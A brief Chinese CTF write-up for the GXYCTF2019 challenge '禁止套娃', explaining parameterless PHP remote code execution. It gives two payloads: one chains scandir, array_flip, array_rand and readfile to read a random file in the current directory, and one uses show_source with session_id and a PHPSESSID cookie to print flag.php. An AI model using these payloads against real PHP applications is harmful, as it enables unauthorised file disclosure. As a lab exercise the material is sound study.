刷题记录：[GXYCTF2019]禁止套娃

目录

• 刷题记录：[GXYCTF2019]禁止套娃
• 知识点
  • 无参数RCE

刷题记录：[GXYCTF2019]禁止套娃

题目复现链接：https://buuoj.cn/challenges

知识点

无参数RCE

echo(readfile(array_rand(array_flip(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))));
array_rand从数组中随机取出一个键
array_filp交换数组键值

或者show_source(session_id(session_start()));
然后加上cookiePHPSESSID=flag.php